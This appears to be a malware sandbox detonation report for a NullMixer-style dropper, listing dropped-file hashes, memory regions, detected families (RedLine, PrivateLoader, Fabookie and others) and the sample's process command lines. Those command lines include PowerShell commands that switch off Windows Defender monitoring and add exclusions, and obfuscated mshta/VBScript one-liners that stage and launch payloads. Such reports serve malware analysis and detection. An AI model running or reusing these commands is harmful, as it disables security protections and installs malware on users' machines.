| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068a6c101a0e81.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067fa7edd4b875a.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed067ba5199af5f.exe
| MD5 | a4bf9671a96119f7081621c2f2e8807d |
| SHA1 | 47f50ae20bfa8b277f8c8c1963613d3f4c364b94 |
| SHA256 | d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7 |
| SHA512 | f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed0639114ac9fa.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed068cfd71e196da.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zSC12262D6\Wed06d8092a5ae.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P156RKKE6NHSISTNHGDL.temp
| MD5 | 83e9e25dde4e7decee78c786b780f76c |
| SHA1 | 34be6aede0a62330000771c7a44b3aeff032342e |
| SHA256 | b0944d40ea1d27ed776764e7d2cb089a59ada01da1bea2bfac21862c9ac2e2ec |
| SHA512 | 821ed0eaf421c6c51e7ff1dcc901f30eda2a27585f59f8be8cd22837d06f259ce12db37387b83ba7bcd3b4dca10f3746d0c7fd3540f121aad9a9afb74662946c |
memory/1328-142-0x0000000000400000-0x0000000000414000-memory.dmp
memory/692-143-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GOQNV.tmp\Wed067fa7edd4b875a.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/1772-145-0x0000000000B30000-0x0000000000B38000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2100-151-0x0000000000E20000-0x0000000000E90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-V7F3J.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2732-159-0x0000000000350000-0x0000000000356000-memory.dmp
memory/580-150-0x0000000000290000-0x0000000000300000-memory.dmp
memory/2732-149-0x0000000000310000-0x0000000000326000-memory.dmp
memory/1800-141-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
| MD5 | 508251b34a5ea5271e6c8d365b3623d2 |
| SHA1 | a6f057ba3154fca2a2000cbb7ee9c171c682a8ac |
| SHA256 | a111e371822094423c652cef67b75663d97e7d7a18c33213d745a1f2075d210f |
| SHA512 | 981e33ee2c1d699304165d7d96af3de99509b7dc0ce6f7a3e49c763f58ae4227f1d60056997adc366de9203d86d469de3062542b2ba147303848d6e4d26bf170 |
memory/2776-178-0x0000000000B70000-0x0000000000CCD000-memory.dmp
memory/1328-90-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC12262D6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/888-179-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-191-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-189-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-188-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/888-183-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-185-0x0000000000400000-0x0000000000422000-memory.dmp
memory/888-181-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2640-192-0x0000000000400000-0x000000000051C000-memory.dmp
memory/2640-199-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2640-201-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2640-200-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2776-202-0x0000000002AC0000-0x0000000002B67000-memory.dmp
memory/2640-198-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2640-196-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2776-204-0x0000000002B70000-0x0000000002C04000-memory.dmp
memory/2776-206-0x0000000002B70000-0x0000000002C04000-memory.dmp
memory/2776-203-0x0000000002B70000-0x0000000002C04000-memory.dmp
memory/1156-217-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1156-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1156-216-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1156-215-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1156-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1156-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1156-209-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2724-220-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/992-223-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/692-222-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2776-224-0x0000000000B70000-0x0000000000CCD000-memory.dmp
memory/2776-231-0x0000000002B70000-0x0000000002C04000-memory.dmp
memory/2776-233-0x0000000004BD0000-0x0000000004C5D000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240903-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2056 set thread context of 1656 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f7871e5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\f78aa43.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f78aa43.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7871e5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe
Sat060fd7e42d2.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe
Sat0618d93ac2c5c.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 272
C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0675f75df01bdb.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """"== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe") do taskkill /F -Im "%~NxU"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe
H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5
C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Sat06f5ed0e3bb24.exe" /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Sat0663b341399ee.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE(CReAteObJect("WScRipT.ShELL" ).RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5""== """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F ", 0 , TrUe ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5"== "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\mshta.exe
